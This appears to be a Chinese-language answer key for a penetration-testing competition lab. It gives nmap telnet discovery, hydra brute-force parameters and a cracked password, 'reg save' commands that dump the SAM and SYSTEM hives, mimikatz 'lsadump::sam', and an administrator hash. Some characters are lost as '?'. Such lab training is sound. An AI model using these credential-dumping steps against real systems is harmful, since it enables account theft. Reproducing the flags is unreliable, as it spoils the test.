- 通過本地PC中滲透測試平臺Kali對服務器場景Windows進?系統服務及版本掃描滲透測 試,并將該操作顯示結果中Telnet服務對應的端?號作為FLAG提交
使用nmap掃描發現目標靶機開放端口232疑似telnet直接進行連接測試成功
Flag:232
- 通過本地PC中滲透測試平臺Kali對服務器場景Windows進?滲透測試,使?kali中hydra對 服務器Telnet服務進?暴?破解(?戶名為teltest),將hydra使?的必要參數當做FLAG進 ?提交(例:nmap -s -p 22);(字典路徑/usr/share/wordlists/dirb/small.txt)
必須用的參數是-s
Flag:hydra -l?-P?-s telnet
- 通過本地PC中滲透測試平臺Kali對服務器場景Windows進?滲透測試,使?kali中hydra對 服務器Telnet服務進?暴?破解(?戶名為teltest),將破解成功的密碼當做FLAG進?提 交;(字典路徑/usr/share/wordlists/dirb/small.txt)
Flag:customer
- 通過本地PC中滲透測試平臺win7對服務器場景Windows進?滲透測試,取得的賬戶密碼有 遠程桌?權限,將該場景系統中sam?件使?reg相關命令提取,將完整命令作為FLAG提 交
Flag:reg save hklm\sam sam.hive
- 通過本地PC中滲透測試平臺win7對服務器場景Windows進?滲透測試,取得的賬戶密碼有 遠程桌?權限,將該場景系統中system?件使?reg相關命令提取,將完整命令作為FLAG提 交;
Flag:reg save hklm\system system.hive
- 通過本地PC中滲透測試平臺win7對服務器場景Windows進?滲透測試,將sam?件與 system?件提取到本地,使?桌?mimikatz?具提取teltest密碼信息,將提取信息的命令作 為FLAG提交;
將sam.hive和system.hive文件復制到win7的c盤根目錄然后使用mimikatz工具提取
Flag:lsadump::sam
- 通過本地PC中滲透測試平臺win7對服務器場景Windows進?滲透測試,將sam?件與 system?件提取到本地,使?桌?mimikatz?具提取administrators密碼信息,將提取到的 hash值作為FLAG提交
Flag:6cfa9ce05f0afaa483beaea6567ea26e
競賽環境請聯系主頁